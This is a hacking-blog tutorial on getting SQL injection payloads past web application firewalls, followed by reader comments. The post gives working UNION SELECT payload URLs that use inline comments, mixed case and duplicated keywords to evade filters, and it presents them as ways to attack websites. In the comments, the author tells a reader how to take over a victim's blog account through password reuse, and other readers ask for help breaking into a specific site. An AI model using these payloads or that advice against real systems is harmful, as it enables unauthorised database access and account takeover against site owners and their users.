SQL Injection Part 5 – Bypassing WAF

In my previous posts, i have explained about different types of SQL injections. Some times, when we try to retrieve data from SQLi vulnerable websites, we end up with forbidden error. Today i will explain why you get such errors and  how you can  bypass such errors and perform successful attacks on websites. If you have not read my previous posts and if you are new to SQLi, I would suggest you to read them before proceeding.

You can read them from here.

What is WAF?
WAF stands for Web Application Firewall. In order to prevent the attacks such as SQLi and XSS, administrators put Web Application Firewalls. These WAFs detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable and can be easily bypassed.

How it works??
When the WAF detects malicious attempts, our input URL gives a forbidden error as shown in the following figure.

Our aim is to bypass this error and need to retrieve data from the database using some special techniques. There are many methods to bypass WAF. In this tutorial, i am going to show you some basic methods. These methods are especially for beginners.

Methods To Bypass WAF
Comments :-
Comments allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query.

Actual query
http://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5—

Query To  Bypass the WAF
http://vulnerablesite.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—

Capitalization Of Functions:-
Some WAF’s will filter only lowercase alphabets, So we can easily evade this by case changing.

Actual query
http://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Query to  bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—

Replaced Keywords:-
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.

Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Query to  bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--

Hope you liked this article. Feel free to leave your comments for further doubts and clarifications.
About the Guest Author:
This article is written by Mr Srinivas, He owns Hackinginception where he writes articles related to hacking .If your interested in writing a guest post @Hackaholic please contact me

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...


this website r really interesting..can u write about how to bypass those annoying survey next time..hope u can help


Fantastic Articles by Srinivas... I am being a fan of you.

Good boy

Hi srinivas,

your articles are almost fantastic.But i would like to know is there any way that we can hack Blogs (Like blogspot and Wordpress) with hacking the email addresses of respective blogs

srini0x00 said on November 21, 2011 at 12:22 AM :

@Good boy

Bro the articles i am writing are applicable to websites having independent databases. Blogger is under google :)
So these methods wont work there.
BTW if your victim is using the same id and password for both blogger and his personal email id, you can hack it.For that, Just follow the methods used for email attacks.

srini0x00 said on November 21, 2011 at 12:26 AM :

we will write the one soon..
keep on visiting hackaholic.. :)

srini0x00 said on November 21, 2011 at 1:30 AM :

Fantastic Articles by Srinivas... I am being a fan of you

Thank you and keep visiting for more and more stuff.. :)

Sampath said on February 18, 2012 at 9:23 AM :

Srinivas good tutorial, am from AP too !


what about .aspx site there i did not found vulnerable id this site link is like "login.aspx " like this so please share how i can start to this site


TUSHAR said on August 23, 2012 at 8:53 AM :

CAN U give some more ways of how to BYPASS WAF??

Man in the middle said on April 16, 2013 at 4:23 AM :

mr.srinivas i thank you for this explanation

and i want to ask you

that i have a site this site using asp
i try to but ' at the end of url but when i hit enter the site redirect me to the page that named noaccess.php and print a text "Access Denied" i try to bypass that by adding a false statement like that :

and i have this error :
Server Error
500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be displayed.
but i notice here there is no redirect ,, i still on the same page view.asp
how can i bypassing this

and thanks you again

Man in the middle said on May 2, 2013 at 5:50 AM :

mr.srinivas please reply i'm waiting !!!!!!!!!!!!!!


Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger